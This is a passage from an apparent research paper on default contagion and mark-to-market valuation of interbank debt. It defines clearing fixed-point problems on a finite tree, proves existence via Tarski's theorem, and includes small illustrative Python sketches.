On the liability side of the balance sheet, bank $i$ has liabilities $\bar p_i := \sum_{j = 1}^n L_{ij} + L_{i0}$ with external liabilities $L_{i0} \geq 0$.
We will often denote $\vec{x} := (x_1,x_2,...,x_n)^\top \in \mathbb{R}^n_+$, $\vec{L} := (L_{ij})_{i,j = 1,2,...,n} \in \mathbb{R}^{n \times n}_+$, $\vec{L}_0 := (L_{ij})_{i = 1,2,...,n;~j=0,1,...,n} \in \mathbb{R}^{n \times (n+1)}_+$, and $\bar\vec{p} := \vec{L}_0\vec{1} \in \mathbb{R}^n_+$.
With these assets and liabilities, we can consider the default contagion problem. Consider $P_i \in \{0,1\}$ to be the indicator of whether bank $i$ is solvent ($P_i = 1$) or in default on its obligations ($P_i = 0$). Following a notion of recovery of liabilities, if a bank is in default then it will repay a fraction $\beta \in [0,1]$ of its obligations; the Rogers--Veraart model~(\cite{RV13}) is comparable but with recovery of assets instead.
Mathematically, $\vec{P} \in \{0,1\}^n$ solves the fixed point problem
\begin{equation}\label{eq:GK}
\vec{P} = \psi(\vec{P}) := \ind{\vec{x} + \vec{L}^\top [\vec{P} + \beta(1-\vec{P})] \geq \bar\vec{p}} = \ind{\vec{x} + \vec{L}^\top[\beta + (1-\beta)\vec{P}] \geq \bar\vec{p}}.
\end{equation}
\begin{proposition}\label{prop:GK}
The set of clearing solutions to~\eqref{eq:GK}, i.e., $\{\vec{P}^* \in \{0,1\}^n \; | \; \vec{P}^* = \psi(\vec{P}^*)\}$, forms a lattice in $\{0,1\}^n$ with greatest and least solutions $\vec{P}^\uparrow \geq \vec{P}^\downarrow$.
\end{proposition}
\begin{proof}
This follows from a direct application of Tarski's fixed point theorem.
\end{proof}
To conclude this discussion of the static system, let $\vec{P}^*$ be an arbitrary clearing solution of~\eqref{eq:GK}. The resulting net worths $\vec{K} = \vec{x} + \vec{L}^\top [\vec{P}^*+\beta(1-\vec{P}^*)] - \bar\vec{p}$ provide the difference between realized assets and liabilities. The cash account $\vec{V} = \vec{K}^+$ provides the assets-on-hand for each institution immediately after liabilities are paid; notably the cash account equals the net worths if, and only if, the bank is solvent, otherwise it is zero.
\begin{remark}
As mentioned above, throughout this work we consider the case of recovery of liabilities. This notion corresponds to the ``recovery of face value'' accounting rule in the corporate bond literature (see, e.g.,~\cite{guo2008distressed,hilscher2021valuation}). The recovery of assets case, as in~\cite{RV13}, could be considered instead. We restrict ourselves to the recovery of liabilities because this formulation has been shown to ``provide a better approximation to realized recovery rates'' (\cite{hilscher2021valuation}) than the recovery of assets formulation.
\end{remark}
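As a concrete illustration of Proposition~\ref{prop:GK}, the greatest clearing solution $\vec{P}^\uparrow$ of~\eqref{eq:GK} can be obtained by monotone iteration of $\psi$ starting from $\vec{P} = \vec{1}$: since $\psi$ is order-preserving on the finite lattice $\{0,1\}^n$, the iterates decrease to $\vec{P}^\uparrow$ in at most $n$ steps. A minimal Python sketch follows; the three-bank chain and its numbers are hypothetical.

```python
import numpy as np

def greatest_clearing(x, L, ext_liab, beta):
    """Greatest fixed point of psi(P) = 1{x + L^T [beta + (1-beta) P] >= pbar}."""
    pbar = L.sum(axis=1) + ext_liab
    P = np.ones(len(x))
    while True:
        newP = (x + L.T @ (beta + (1 - beta) * P) >= pbar).astype(float)
        if np.array_equal(newP, P):
            K = x + L.T @ (beta + (1 - beta) * P) - pbar  # net worths
            return P, K
        P = newP

# toy chain: bank 0 owes bank 1, bank 1 owes bank 2 (all values hypothetical)
x = np.array([1.0, 0.5, 0.5])
L = np.array([[0.0, 1.0, 0.0],
              [0.0, 0.0, 1.0],
              [0.0, 0.0, 0.0]])
P, K = greatest_clearing(x, L, ext_liab=np.array([1.5, 0.0, 0.0]), beta=0.0)
# bank 0's fundamental default drags bank 1 down; bank 2 stays solvent
```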
\subsection{Tree model}\label{sec:setting-tree}
For the remainder of this work, we will consider a \emph{stochastic} financial system. For mathematical simplicity, we will focus entirely on tree models for the randomness in the system.
That is, throughout this work, we consider a \emph{finite} filtered probability space $(\Omega,\mathcal{F},(\mathcal{F}_{t_l})_{l = 0}^\ell,\P)$ with times $0 =: t_0 < t_1 < ... < t_\ell := T$, $\mathcal{F}_T = \mathcal{F} = 2^\Omega$, and $\mathcal{F}_0 = \{\emptyset,\Omega\}$.
Following the notation from~\cite{FR14-alg}, we will define $\Omega_t$ to be the set of atoms of $\mathcal{F}_t$. For any $\omega_{t_l} \in \Omega_{t_l}$ ($l < \ell$), we denote the successor nodes by
\[\succ(\omega_{t_l}) = \{\omega_{t_{l+1}} \in \Omega_{t_{l+1}} \; | \; \omega_{t_{l+1}} \subseteq \omega_{t_l}\}.\]
To simplify notation, let $\mathcal{L}_t := L^\infty(\Omega,\mathcal{F}_t,\P) = \mathbb{R}^{|\Omega_t|}$ denote the space of $\mathcal{F}_t$-measurable random variables.
We use the convention that for an $\mathcal{F}_t$-measurable random variable $x \in \mathcal{L}_t$, we denote by $x(\omega_t)$ the value of $x$ at node $\omega_t \in \Omega_t$, that is $x(\omega_t) := x(\omega)$ for some $\omega \in \omega_t$ chosen arbitrarily.
\begin{assumption}\label{ass:msr}
Throughout this work we consider an (arbitrage-free) market of $n$ external assets $\vec{x} \in \prod_{l = 0}^\ell \mathcal{L}_{t_l}^n$ on the tree. This is made more explicit in Sections~\ref{sec:1maturity-bs} and~\ref{sec:Kmaturity-bs} below.
To simplify the discussion, we consider the probability measure $\P$ to provide a pricing measure consistent with $\vec{x}$.
\end{assumption}
Often, for the case studies, we consider a specific tree model from~\cite{he1990convergence} to construct a geometric random walk for a financial system with $n$ banks. This multinomial tree permits us to encode a correlation structure on our processes from $n+1$ branches at each node.
Let $(\Omega^n,\mathcal{F}^n,(\mathcal{F}_{l\Delta t}^n)_{l = 0}^{T/\Delta t},\P^n)$ denote the filtered probability space for this multinomial tree with constant time steps $\Delta t > 0$. (For simplicity, we assume throughout that $T$ is divisible by the time step $\Delta t$.) As there are $n+1$ branches at each node within this tree, $|\Omega_t^n| = (n+1)^{t/\Delta t}$ at each time $t = 0,\Delta t,...,T$ with equal probability $\P^n(\omega_t^n) = (n+1)^{-t/\Delta t}$ for any $\omega_t^n \in \Omega_t^n$.
Because of the regularity of this system, we will index the atoms at time $t$ as $\omega_{t,i}^n \in \Omega_t^n$ for $i = 1,2,...,(n+1)^{t/\Delta t}$. Similarly, we can encode the successor nodes automatically as $\succ(\omega_{t,i}^n) = \{\omega_{t+\Delta t,j}^n \; | \; j \in (n+1)(i-1)+\{1,...,n+1\}\}$ for any time $t$ and atom $i$.
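This indexing is purely arithmetic; a trivial Python transcription (using the same $1$-based convention as the text):

```python
def successors(i, n):
    """1-based indices of the n+1 successor atoms of atom omega_{t,i}."""
    return [(n + 1) * (i - 1) + j for j in range(1, n + 2)]
```

In particular, the successors of the $(n+1)^{t/\Delta t}$ atoms at one time level tile the $(n+1)^{t/\Delta t + 1}$ atoms at the next.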
Within the tree $(\Omega^n,\mathcal{F}^n,(\mathcal{F}_{l\Delta t}^n)_{l = 0}^{T/\Delta t},\P^n)$, we are interested in a discrete analog $\vec{x} := (\vec{x}(0),\vec{x}(\Delta t),...,\vec{x}(T)) \in \prod_{l = 0}^{T/\Delta t} \mathcal{L}_{l\Delta t}^n$ of the vector-valued geometric Brownian motion (such that $\vec{x}(t) = (x_1(t),x_2(t),...,x_n(t))^\top$). Following the construction in~\cite{he1990convergence}, let $\sigma = (\sigma_1,...,\sigma_n) \in \mathbb{R}^{n \times n}$ be a nondegenerate matrix encoding the desired covariance structure $C = \sigma^2$.
The $k^\text{th}$ element $x_k$ can be defined recursively by
\begin{align}
\label{eq:gbm} x_k(t+\Delta t,\omega_{t+\Delta t,(n+1)(i-1)+j}^n) &= x_k(t,\omega^n_{t,i})\exp\left((r - \frac{\sigma_{kk}^2}{2})\Delta t + \sigma_k^\top \tilde{\epsilon}_j\sqrt{\Delta t}\right)
\end{align}
for some initial point $x_k(0,\Omega^n) \in \mathbb{R}_{++}$ and such that $\tilde{\epsilon} = (\tilde{\epsilon}_1,...,\tilde{\epsilon}_{n+1}) \in \mathbb{R}^{n \times (n+1)}$ is generated from an $(n+1)\times(n+1)$ orthogonal matrix as in~\cite{he1990convergence}.
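One way to realize the orthogonal-matrix construction numerically is to orthonormalize any full-rank matrix whose first column is constant and rescale the remaining columns; the resulting rows then sum to zero and have identity covariance under the uniform branch probabilities. The Python sketch below takes this route. The QR factorization is our choice, not prescribed by the text; likewise, `gbm_step` uses the column norm $\|\sigma_k\|^2$ as the martingale correction, which reduces to the text's $\sigma_{kk}^2$ when $\sigma$ is diagonal.

```python
import numpy as np

def branch_vectors(n):
    """n+1 vectors eps_j in R^n with sum_j eps_j = 0 and
    (1/(n+1)) * sum_j eps_j eps_j^T = I_n under uniform branch probabilities."""
    A = np.ones((n + 1, n + 1))
    A[:, 1:] = np.eye(n + 1)[:, 1:]      # full rank, constant first column
    Q, _ = np.linalg.qr(A)               # first column of Q spans the constants
    return np.sqrt(n + 1) * Q[:, 1:]     # row j is eps_{j+1}

def gbm_step(x_now, sigma, r, dt, j, eps):
    """Asset values at the j-th successor node (one step of the recursion)."""
    vol2 = np.sum(sigma ** 2, axis=0)    # ||sigma_k||^2 for each asset k
    return x_now * np.exp((r - vol2 / 2) * dt + (sigma.T @ eps[j]) * np.sqrt(dt))

eps = branch_vectors(3)                  # 4 branch vectors in R^3
```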
\section{Single maturity setting}\label{sec:1maturity}
To simplify the presentation and to separate out those effects that arise due to dynamic networks (see Section~\ref{sec:Kmaturity} and also~\cite{BBF18}) from those arising due to the pricing and endogenous default notions considered in this section, we will begin by assuming that all interbank and external obligations $L_{ij},L_{i0}$ (for $i,j \in \{1,2,...,n\}$) have the same maturity $T$. We start our discussion of this single maturity setting by presenting the basic balance sheet notions in Section~\ref{sec:1maturity-bs}. With this balance sheet construction, we then derive the clearing problem and deduce the existence of (minimal and maximal) equilibria in Section~\ref{sec:1maturity-model}. Next, we consider two useful reformulations of the resulting mathematical model for the clearing problem: the first relies on Bayes' rule to provide a forward-backward equation (Section~\ref{sec:1maturity-recursion}) that is tractable computationally; the second provides a dynamic programming principle formulation (Section~\ref{sec:1maturity-dpp}) for the maximal clearing solution which, in particular, provides a Markovian property for this clearing solution. Finally, we conclude the section with case studies in Section~\ref{sec:1maturity-cs}.
\subsection{Balance sheet construction}\label{sec:1maturity-bs}
\begin{figure}[h!]
\centering
\begin{tikzpicture}
\draw[draw=none] (0,6.5) rectangle (6.5,7) node[pos=.5]{\bf Book Value at Time $t$};
\draw[draw=none] (0,6) rectangle (3.25,6.5) node[pos=.5]{\bf Assets};
\draw[draw=none] (3.25,6) rectangle (6.5,6.5) node[pos=.5]{\bf Liabilities};
\filldraw[fill=blue!20!white,draw=black] (0,4) rectangle (3.25,6) node[pos=.5,style={align=center}]{External \\ $x_i(t)$};
\filldraw[fill=yellow!20!white,draw=black] (0,0) rectangle (3.25,4) node[pos=.5,style={align=center}]{Interbank \\ $e^{-r(T-t)}\sum_{j = 1}^n L_{ji}$};
\filldraw[fill=purple!20!white,draw=black] (3.25,3) rectangle (6.5,6) node[pos=.5,style={align=center}]{Total \\ $e^{-r(T-t)}\bar p_i$};
\filldraw[fill=orange!20!white,draw=black] (3.25,0) rectangle (6.5,3) node[pos=.5,style={align=center}]{Capital \\ $x_i(t) - e^{-r(T-t)}\bar p_i$ \\ $+ e^{-r(T-t)}\sum_{j = 1}^n L_{ji}$};
\draw[->,line width=1mm] (7,3) -- (8,3);
\draw[draw=none] (8.5,6.5) rectangle (15,7) node[pos=.5]{\bf Realized Balance Sheet at Time $t$};
\draw[draw=none] (8.5,6) rectangle (11.75,6.5) node[pos=.5]{\bf Assets};
\draw[draw=none] (11.75,6) rectangle (15,6.5) node[pos=.5]{\bf Liabilities};
\filldraw[fill=blue!20!white,draw=none] (8.5,4) rectangle (11.75,6) node[pos=.5,style={align=center}]{External \\ $x_i(t)$};
\filldraw[fill=yellow!20!white,draw=black] (8.5,1) rectangle (11.75,4) node[pos=.5,style={align=center}]{Interbank \\ $\sum_{j = 1}^n p_{ji}(t)$};
\filldraw[fill=yellow!20!white,draw=black] (8.5,0) rectangle (11.75,1);
\filldraw[fill=purple!20!white,draw=black] (11.75,3) rectangle (15,6) node[pos=.5,style={align=center}]{Total \\ $e^{-r(T-t)}\bar p_i$};
\filldraw[fill=orange!20!white,draw=black] (11.75,1) rectangle (15,3) node[pos=.5,style={align=center}]{Capital \\ $x_i(t) - e^{-r(T-t)}\bar p_i$ \\ $+ \sum_{j = 1}^n p_{ji}(t)$};
\filldraw[fill=orange!20!white,draw=black] (11.75,0) rectangle (15,1);
\draw (8.5,0) rectangle (15,6);
\draw (11.75,0) -- (11.75,6);
\begin{scope}
\clip (8.5,0) rectangle (15,1);
\foreach \x in {-8.5,-8,...,15}
{
\draw[line width=.5mm] (8.5+\x,0) -- (15+\x,6);
}
\end{scope}
\end{tikzpicture}
\caption{Stylized book and balance sheet for a firm at time $t$ before maturity of interbank claims.}
\label{fig:balance_sheet}
\end{figure}
In this work we are focused on the valuation of interbank assets with endogenous defaults in a networked system of $n$ banks in a way that extends the static model presented in Section~\ref{sec:setting-network}. We refer to Figure~\ref{fig:balance_sheet} for a visual depiction of both the book value and realized balance sheet for an arbitrary bank $i$ in the financial system. Within this system, we assume a constant risk-free rate $r \geq 0$ used for discounting all obligations.
Consider, first, the banking book for bank $i$ as depicted in Figure~\ref{fig:balance_sheet}. The bank holds two types of assets at time $t$: \emph{external assets} $x_i(t) \in \mathcal{L}_t$ and \emph{interbank assets} $\sum_{j = 1}^n L_{ji}$ where $L_{ji} \geq 0$ is the total amount owed by bank $j$ to bank $i$ ($L_{ii} = 0$ so as to avoid self-dealing). The bank has liabilities $\bar p_i := \sum_{j = 1}^n L_{ij} + L_{i0}$ where $L_{i0} \geq 0$ denotes the \emph{external obligations} of bank $i$. The external assets are held in liquid and marketable assets so that their values fluctuate over time and are adapted to the filtration.
The book value of the capital, discounted appropriately, is given by
\[x_i(t) + e^{-r(T-t)}\sum_{j = 1}^n L_{ji} - e^{-r(T-t)}\bar p_i.\]
However, depending on the probability of default (see below for more details), the interbank assets will not be valued at their face value. That is, the obligation from bank $j$ to $i$ is valued as $p_{ji}(t) := e^{-r(T-t)} L_{ji} (\beta + (1-\beta)\mathbb{E}[P_j(T) \; | \; \mathcal{F}_t]) \in \mathcal{L}_t$, which takes values (almost surely) in the interval $e^{-r(T-t)} L_{ji}\times[\beta,1]$, where $P_j(T,\omega)$ is the realized indicator of solvency for bank $j$ at the maturity time $T$ and $\beta \in [0,1]$ is the recovery rate.
Defining $P_j(t) := \mathbb{E}[P_j(T) \; | \; \mathcal{F}_t] \in \mathcal{L}_t$ as the (conditional) probability of solvency at maturity as measured at time $t$, we can write the discounted payments as $p_{ji}(t) = e^{-r(T-t)} L_{ji}(\beta+(1-\beta)P_j(t))$. Thus, the realized balance sheet for bank $i$ may include write-downs in the value of its assets and, therefore, the realized capital at time $t$ is given by
\[K_i(t) = x_i(t) + e^{-r(T-t)} \sum_{j = 1}^n L_{ji} (\beta+(1-\beta)P_j(t)) - e^{-r(T-t)}\bar p_i.\]
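In vectorized form, this capital formula can be transcribed directly; the two-bank inputs below are hypothetical.

```python
import numpy as np

def capital(x_t, L, ext_liab, P_t, beta, r, ttm):
    """K(t) = x(t) + e^{-r(T-t)} * (L^T [beta + (1-beta) P(t)] - pbar)."""
    pbar = L.sum(axis=1) + ext_liab
    disc = np.exp(-r * ttm)
    return x_t + disc * (L.T @ (beta + (1 - beta) * P_t) - pbar)

# two banks: bank 0 owes bank 1 one unit; bank 0's survival probability is 0.5
K = capital(x_t=np.array([1.0, 0.2]),
            L=np.array([[0.0, 1.0], [0.0, 0.0]]),
            ext_liab=np.array([0.5, 0.5]),
            P_t=np.array([0.5, 1.0]),
            beta=0.0, r=0.0, ttm=1.0)
```

Here bank 1's interbank asset is marked down to its expected payment, so its capital reflects bank 0's possible future default.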
The default determination of banks is fundamental for determining the value of interbank assets. In this work, as in the static setting, we will assume that bank $i$ will default on their obligations at the first time their realized capital drops below 0, i.e., at the stopping time $\tau_i$ given by
\begin{equation}\label{eq:default}
\tau_i := \inf\left\{t \geq 0 \; \left| \; K_i(t) < 0 \right.\right\}.
\end{equation}
In the context of endogenous defaults, the shareholders of bank $i$ choose to default at time $t$ when expected bank assets are worth less than the liabilities; by declaring bankruptcy, these shareholders are able to increase their risk-neutral utility as zero capital is preferred to negative expected return. Alternatively, these defaults can be triggered by a safety covenant as in~\cite{black1976valuing,leland1994corporate}.
This default condition was studied in~\cite{feinstein2021dynamic} in a different dynamic network context.
By convention, and without loss of generality, we will assume $\tau_i(\omega) = T+1$ if bank $i$ does not default on $\omega \in \Omega$.
With banks defaulting when their capital drops below 0, this network valuation problem can be viewed as a fixed point problem in pricing digital (down-and-out) barrier options. That is, $P_i(t)$ is the value of a digital barrier option with maturity $T$ that pays \$1 if the capital level $K_i$ never drops below the barrier at 0 and \$0 otherwise. This is a fixed point due to the dependence of the capital $K_i$ on the value of the barrier options $P_j$ for banks $j \neq i$.
As such, though we do not compute the valuations as digital barrier options, we view this system as being inextricably linked to questions in derivatives pricing.
\begin{remark}\label{rem:literature}
\begin{enumerate}
\item\label{rem:illiquid} The default rule considered herein implicitly studies the liquidity problem as well because bank $i$ has sufficient assets to cover its liabilities at the maturity $T$ if and only if the realized capital at $T$ is nonnegative. If only the liquidity question is desired, then the default time can be reformulated such that $\tau_i = T+\ind{K_i(T) \geq 0}$, i.e., bank $i$ is in default if and only if it has insufficient capital at maturity to cover its obligations. This illiquidity default rule is akin to the financial setting of~\cite{banerjee2022pricing}.
\item The condition that a bank will default when its net worth is negative is similarly considered in~\cite{BBF18,feinstein2021dynamic}. However, fundamentally different from those works (which consider a backward-looking historical price accounting rule), herein we consider a forward-looking mark-to-market accounting rule which values interbank assets based on the \emph{future} probability of default.
\end{enumerate}
\end{remark}
\begin{remark}\label{rem:nonmarketable}
Throughout this work we assume that the interbank network is fixed even as the value of these obligations can fluctuate. As we assume all valuations are taken w.r.t.\ the risk-neutral measure $\P$, and under the assumption that banks are risk-neutral themselves, in equilibrium the banks have no (expected) gains by altering the network structure by buying or selling interbank obligations. Moreover, in reality, these interbank markets may not be liquid; therefore, transacting to buy or sell interbank debt could be accompanied by transaction costs and price slippage which discourage any such modifications to the network.
\end{remark}
\subsection{Mathematical model}\label{sec:1maturity-model}
As highlighted within the balance sheet modeling, we can immediately define an equilibrium model for default contagion that is jointly on the net worths ($\vec{K} = (K_1,...,K_n)^\top$), survival probabilities ($\vec{P} = (P_1,...,P_n)^\top$), and default times ($\boldsymbol{\tau} = (\tau_1,...,\tau_n)^\top$).
We can, thus, define the domain for this default contagion model as the complete lattice
\begin{equation*}
\mathbb{D}^T := \left\{(\vec{K},\vec{P},\boldsymbol{\tau}) \in \left(\prod_{l = 0}^\ell \mathcal{L}_{t_l}^n\right)^2 \times \{t_0,t_1,...,t_\ell,T+1\}^{|\Omega| \times n} \; \left| \; \begin{array}{l} \forall t = t_0,t_1,...,t_\ell: \\ \vec{K}(t) \in \vec{x}(t) + e^{-r(T-t)}\left([\vec{0} \; , \; \vec{L}^\top\vec{1}] - \bar\vec{p}\right) \\ \vec{P}(t) \in [\vec{0} \; , \; \vec{1}] \end{array} \right.\right\}.
\end{equation*}
(We wish to recall for the reader that throughout this work we focus entirely on the tree model structure provided within Section~\ref{sec:setting-tree}, which is, in particular, a finite probability space.)
This clearing system $\Psi^T: \mathbb{D}^T \to \mathbb{D}^T$ is mathematically constructed in~\eqref{eq:1maturity}:
\begin{align}
\label{eq:1maturity} &(\vec{K},\vec{P},\boldsymbol{\tau}) = \Psi^T(\vec{K},\vec{P},\boldsymbol{\tau}) := (\Psi^T_{\vec{K}}(t_l,\vec{P}(t_l)) \; , \; \Psi^T_{\vec{P}}(t_l,\boldsymbol{\tau}) \; , \; \Psi^T_{\boldsymbol{\tau}}(\vec{K}))_{l = 0}^\ell \\
\nonumber &\begin{cases}
\Psi^T_{\vec{K},i}(t,\tilde{\vec{P}}) = x_i(t) + e^{-r(T-t)}\sum_{j = 1}^n L_{ji} (\beta+(1-\beta)\tilde{P}_j) - e^{-r(T-t)}\bar p_i \\
\Psi^T_{\vec{P},i}(t,\boldsymbol{\tau}) = \P(\tau_i > T \; | \; \mathcal{F}_t) \\
\Psi^T_{\boldsymbol{\tau},i}(\vec{K}) = \inf\{t \geq 0 \; | \; K_i(t) < 0\}
\end{cases} \quad \forall i = 1,...,n.
\end{align}
\begin{remark}\label{rem:mckean-vlasov}
The clearing problem $(\vec{K},\vec{P},\boldsymbol{\tau}) = \Psi^T(\vec{K},\vec{P},\boldsymbol{\tau})$ can also be viewed as a discrete-time McKean--Vlasov problem for the process $\vec{K}$ and the conditional law of its first hitting time of zero, thus emphasizing a link to works on continuous-time McKean--Vlasov problems involving hitting times~(\cite{HLS18,NS17}). However, the situation here is very different, as we are now concerned with the law of the hitting time at the maturity $T$ conditional on the information available at time $t$, rather than just the law at time $t$. Whether in discrete- or continuous-time, we are not aware of any works in the literature on McKean--Vlasov problems encompassing problems of this type, but it turns out that the discrete-time setting and monotonicity yields an easy way of obtaining a solution. A more general treatment of this class of problems could pose interesting challenges for future research.
\end{remark}
\begin{theorem}\label{thm:1maturity-exist}
The set of clearing solutions to~\eqref{eq:1maturity}, i.e., $\{(\vec{K}^*,\vec{P}^*,\boldsymbol{\tau}^*) \in \mathbb{D}^T \; | \; (\vec{K}^*,\vec{P}^*,\boldsymbol{\tau}^*) = \Psi^T(\vec{K}^*,\vec{P}^*,\boldsymbol{\tau}^*)\}$, forms a lattice in $\mathbb{D}^T$ with greatest and least solutions $(\vec{K}^\uparrow,\vec{P}^\uparrow,\boldsymbol{\tau}^\uparrow) \geq (\vec{K}^\downarrow,\vec{P}^\downarrow,\boldsymbol{\tau}^\downarrow)$.
\end{theorem}
\begin{proof}
As with Proposition~\ref{prop:GK}, this result follows from a direct application of Tarski's fixed point theorem since $\Psi^T$ is monotonic in the complete lattice $\mathbb{D}^T$.
\end{proof}
\begin{remark}\label{rem:nonunique}
Within Theorem~\ref{thm:1maturity-exist}, we only prove the existence of a clearing solution. Generically, there may not be a unique solution. This can clearly be seen by noting that the static model needs to be satisfied by $(\vec{K}(T),\ind{\vec{K}(T) \geq \vec{0}})$ at maturity time $T$ (in the network formed by banks solvent through $t_{\ell-1}$). Therefore, just by using this static model, we can find that the dynamic clearing system~\eqref{eq:1maturity} need not have a unique solution.
\end{remark}
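The static maturity-$T$ system referenced in Remark~\ref{rem:nonunique} can be computed by monotone iteration from the top of the lattice, mirroring the Tarski argument of Theorem~\ref{thm:1maturity-exist}. A minimal sketch, with hypothetical figures for a two-bank system:

```python
import numpy as np

def greatest_clearing(x, L, ext_obl, beta=0.0):
    """Greatest fixed point of K = x + L^T (beta + (1-beta) 1{K >= 0}) - pbar,
    found by monotone iteration from the all-solvent (top) point."""
    pbar = L.sum(axis=1) + ext_obl             # total obligations of each bank
    solvent = np.ones(len(x), dtype=bool)      # start at the top of the lattice
    while True:
        recovery = beta + (1.0 - beta) * solvent
        K = x + L.T @ recovery - pbar          # net worths given marked claims
        updated = K >= 0
        if np.array_equal(updated, solvent):   # fixed point reached
            return K, solvent
        solvent = updated

# Hypothetical figures: bank 1's shortfall of external assets drags bank 0
# into default as well once its claim on bank 1 is written off (beta = 0).
L = np.array([[0.0, 1.0], [1.0, 0.0]])         # L[i, j]: face value i owes j
K, solvent = greatest_clearing(np.array([1.2, 0.4]), L, np.array([0.5, 0.5]))
```

Because the map is monotone and starts at the top of the lattice, the iterates decrease to the greatest fixed point in at most $n$ passes.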
\begin{remark}\label{rem:integral}
Consider a clearing solution for the tree model $(\Omega^n,\mathcal{F}^n,(\mathcal{F}^n_{l\Delta t})_{l = 0}^{T/\Delta t},\P^n)$ of~\cite{he1990convergence}. Then one can show that, for each bank $i=1,\ldots,n$, there is a predictable process $\boldsymbol{\theta}_i$ such that $\Delta P_i(t) = \boldsymbol{\theta}_i(t)^\top \Delta \tilde{\vec{x}}(t)$ for every time-step $[t,t+\Delta t]$, where $\tilde\vec{x}(t) := e^{-rt}\vec{x}(t)$ is the vector of discounted external asset values. This highlights how the impact of contagion adjusts `continuously' to the movements of the external assets. It also highlights a stark contrast to earlier models based, either explicitly or implicitly, on historical price accounting, whereby the value of interbank debt only updates at an actualized default due solely to the realized losses (c.f.~\cite{feinstein2021dynamic} and references therein). In the notation of martingale transforms, we have $P_i(t) = (\boldsymbol{\theta}_i \bullet \tilde{\vec{x}})(t)$, also known as a predictable representation of $P_i$. Using the martingale property of $P_i$ and exploiting the particular tree structure with $n+1$ branches for every node and a non-degenerate covariance matrix for the $n$ external assets, this predictable representation can be deduced from a system of $n$ linear equations in $n$ unknowns. Analogously, a predictable representation can be given for the discounted net worths $e^{-rt}\vec{K}(t)$, noting that these discounted processes are martingales by Assumption~\ref{ass:msr}. For a general tree, such representations are much more complicated; we refer the interested reader to, e.g., \cite[Section IV.3]{protter2005stochastic} and~\cite[Section 3]{ararat2021set}.
\end{remark}
\subsection{An explicit forward-backward representation}\label{sec:1maturity-recursion}
Within~\eqref{eq:1maturity}, we defined the single maturity clearing problem as a fixed point problem. However, the formulation of the clearing system $\Psi^T$ is seemingly complex to compute due to the need to find the probability of solvency $\Psi^T_{\vec{P}}$. Within this section, we will focus on a backwards recursion that can be used to simplify this computation. The basic concept is formulated within~\eqref{eq:1maturity-recursion} below such that the clearing problem is rewritten as $\bar\Psi^T: \mathbb{D}^T \to \mathbb{D}^T$. Within Proposition~\ref{prop:1maturity-recursion}, we demonstrate that the fixed points of $\Psi^T$ and $\bar\Psi^T$ coincide.
Let $(\vec{K},\vec{P},\boldsymbol{\tau}) \in \mathbb{D}^T$; then:
\begin{align}
\label{eq:1maturity-recursion} \bar\Psi^T(\vec{K},\vec{P},\boldsymbol{\tau}) &:= (\Psi^T_{\vec{K}}(t_l,\vec{P}(t_l)) \; , \; \bar\Psi^T_{\vec{P}}(t_l,\vec{P}(t_{[l+1]\wedge\ell}),\boldsymbol{\tau}) \; , \; \Psi^T_{\boldsymbol{\tau}}(\vec{K}))_{l = 0}^\ell \\
\bar\Psi_{\vec{P},i}^T(t_l,\tilde{\vec{P}},\boldsymbol{\tau},\omega_{t_l}) &:= \begin{cases} \sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\omega_{t_{l+1}})\tilde{P}_i(\omega_{t_{l+1}})}{\P(\omega_{t_l})} &\text{if } l < \ell \\ \ind{\tau_i(\omega_T) > T} &\text{if } l = \ell \end{cases} & \forall \omega_{t_l} \in \Omega_{t_l},~i = 1,...,n.
\end{align}
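On a finite tree, the operator $\bar\Psi^T_{\vec{P}}$ is simply a one-step conditional expectation of next-period values. The backward pass can be sketched on a toy binary tree with equally likely branches; the terminal default rule below is purely hypothetical.

```python
from itertools import product

# Backward recursion of survival probabilities on a binary tree with ell
# periods; a node at time l is the tuple of the first l moves, and each branch
# carries probability 1/2.  The terminal rule `survive` is illustrative only.
ell = 3
survive = {path: float(sum(path) >= 2) for path in product((0, 1), repeat=ell)}
P = {ell: survive}                        # P(T) = 1{tau > T} at the leaves
for l in range(ell - 1, -1, -1):          # one-step conditional expectations
    P[l] = {node: 0.5 * P[l + 1][node + (0,)] + 0.5 * P[l + 1][node + (1,)]
            for node in product((0, 1), repeat=l)}
```

By construction the resulting $P$ is a martingale on the tree: the time-0 value equals the unconditional probability of the terminal survival event.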
\begin{proposition}\label{prop:1maturity-recursion}
$(\vec{K},\vec{P},\boldsymbol{\tau}) \in \mathbb{D}^T$ is a clearing solution of~\eqref{eq:1maturity} if and only if it is a fixed point of~\eqref{eq:1maturity-recursion}.
\end{proposition}
\begin{proof}
Let $(\vec{K},\vec{P},\boldsymbol{\tau}) \in \mathbb{D}^T$ be a fixed point of~\eqref{eq:1maturity}. This is a fixed point of~\eqref{eq:1maturity-recursion} if and only if $P_i(t_l,\omega_{t_l}) = \bar\Psi_{\vec{P},i}^T(t_l,\vec{P}(t_{[l+1]\wedge\ell}),\boldsymbol{\tau},\omega_{t_l})$ for every bank $i$, time $l = 0,1,...,\ell$, and state $\omega_{t_l} \in \Omega_{t_l}$.
\begin{itemize}
\item At $l = \ell$: $P_i(T,\omega_T) = \P(\tau_i > T | \mathcal{F}_T)(\omega_T) = \ind{\tau_i(\omega_T) > T}$ for every $\omega_T \in \Omega_T$ by construction of $\mathcal{F}_T = \mathcal{F}$.
\item At $l < \ell$:
Fix $\omega_{t_l} \in \Omega_{t_l}$,
\begin{align*}
P_i(t_l,\omega_{t_l}) &= \P(\tau_i > T | \mathcal{F}_{t_l})(\omega_{t_l}) = \frac{\P(\tau_i > T , \omega_{t_l})}{\P(\omega_{t_l})} = \sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\tau_i > T , \omega_{t_{l+1}})}{\P(\omega_{t_l})} \\
&= \sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\omega_{t_{l+1}}) \P(\tau_i > T | \mathcal{F}_{t_{l+1}})(\omega_{t_{l+1}})}{\P(\omega_{t_l})} = \sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\omega_{t_{l+1}}) P_i(t_{l+1},\omega_{t_{l+1}})}{\P(\omega_{t_l})}.
\end{align*}
\end{itemize}
Let $(\vec{K},\vec{P},\boldsymbol{\tau}) \in \mathbb{D}^T$ be a fixed point of~\eqref{eq:1maturity-recursion}. This is a fixed point of~\eqref{eq:1maturity} if and only if $P_i(t_l) = \Psi_{\vec{P},i}^T(t_l,\boldsymbol{\tau})$ almost surely for every time $l = 0,1,...,\ell$; we proceed by backward induction.
\begin{itemize}
